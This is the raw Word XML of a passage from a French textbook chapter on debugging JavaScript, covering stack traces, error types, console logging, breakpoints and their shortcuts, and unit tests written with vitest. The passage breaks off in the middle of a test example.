            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Console, journal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="229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Isoler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="366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Quelle ligne ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Points d'arrêt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2292"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Observer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3667"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Quelles valeurs ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Panneau Sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="229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Corriger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="366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Quelle cause racine ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Analyse du code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2292"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vérifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3667"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Le défaut est-il clos ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Test de régression</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LE PIÈGE DE LA CORRECTION AU HASARD</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Ajouter une condition jusqu'à ce que le symptôme disparaisse produit du code incompréhensible. Si vous ne pouvez pas expliquer </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>pourquoi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> la correction fonctionne, vous n'avez pas trouvé la cause.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>32.2 La console et ses messages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le message d'une erreur contient trois informations : le type, le message et la pile d'appels. La pile se lit de haut en bas : la première ligne est l'endroit où l'erreur est survenue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une erreur typique, avec sa pile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TypeError: Cannot read properties of null (reading 'value')</w:t>
        <w:br/>
        <w:t xml:space="preserve">    at validerFormulaire (app.js:42:18)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    at HTMLFormElement.&lt;anonymous&gt; (app.js:67:3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.100 — Cinq familles d'erreurs et leur cause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4507"/>
        <w:gridCol w:w="4507"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
          <w:tblHeader w:val="true"/>
        </w:trPr>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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600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Cause fréquente</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ReferenceError</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6009"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Variable non déclarée ou hors portée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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TypeError</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600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Appel sur </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>undefined</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>null</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SyntaxError</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6009"/>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Erreur de frappe, souvent un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> manquant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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RangeError</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600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Récursion infinie ou index hors bornes</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DOMException</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6009"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>API utilisée dans un contexte invalide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Des traces utiles, pas un déluge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Localiser l'erreur au lieu de la masquer</w:t>
        <w:br/>
        <w:t>console.error("Valeur de champ :", champ, "Formulaire :", formulaire);</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Grouper des mesures</w:t>
        <w:br/>
        <w:t>console.group("Validation");</w:t>
        <w:br/>
        <w:t>console.log("valeur", champ.value);</w:t>
        <w:br/>
        <w:t>console.log("valide", champ.checkValidity());</w:t>
        <w:br/>
        <w:t>console.groupEnd();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>32.3 Points d'arrêt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un point d'arrêt suspend l'exécution à une ligne précise. On peut alors inspecter les variables, avancer pas à pas, entrer dans une fonction ou évaluer une expression.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.101 — Six commandes de débogage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44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Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="275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Raccourci usuel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="382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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2445"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Point d'arrêt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Clic sur le numéro de ligne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3820"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Suspend à cette ligne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="244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Reprendre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="275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F8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="382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Continue jusqu'au prochain arrêt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2445"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pas à pas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>F10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3820"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Exécute la ligne suivante</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="244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Entrer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="275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F11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="382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Entre dans la fonction appelée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2445"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sortir</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Maj+F11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3820"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Termine la fonction courante</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="244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Désactiver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="275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Ctrl+F8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="382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Ignore tous les arrêts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un point d'arrêt conditionnel minuscule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function calculerTotal(lignes) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  debugger;                 // suspend ici si les outils sont ouverts</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return lignes.reduce((t, l) =&gt; t + l.prix * l.quantite, 0);</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le point d'arrêt conditionnel s'active uniquement quand une expression est vraie, par exemple </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lignes.length &gt; 100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Il évite de cliquer sur « Reprendre » pendant vingt minutes sur une boucle.</w:t>
      </w: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REPRODUIRE EN ISOLATION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Si un défaut n'apparaît que dans une page complexe, extrayez la fonction fautive dans un fichier réduit avec les mêmes entrées. Le défaut qui persiste est alors beaucoup plus facile à localiser.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>32.4 Tests unitaires</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un test unitaire vérifie une fonction isolée, avec une entrée connue et un résultat attendu. Il protège contre les régressions et documente le comportement attendu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois cas, trois assertions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fonction testée</w:t>
        <w:br/>
        <w:t>export function formaterPrix(centimes, devise = "EUR") {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const valeur = (centimes / 100).toFixed(2).replace(".", ",");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return `${valeur} ${devise}`;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>// test</w:t>
        <w:br/>
        <w:t>import { test, expect } from "vitest";</w:t>
        <w:br/>
        <w:br/>
        <w:t>test("formate un prix en euros", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  expect(formaterPrix(1234)).toBe("12,34 EUR");</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>test("accepte une autre devise", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  expect(formaterPrix(500, "USD")).toBe("5,00 USD");</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>test("gère zéro", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  expect(formaterPrix(0)).toBe("0,00 EUR");</w:t>
        <w:br/>
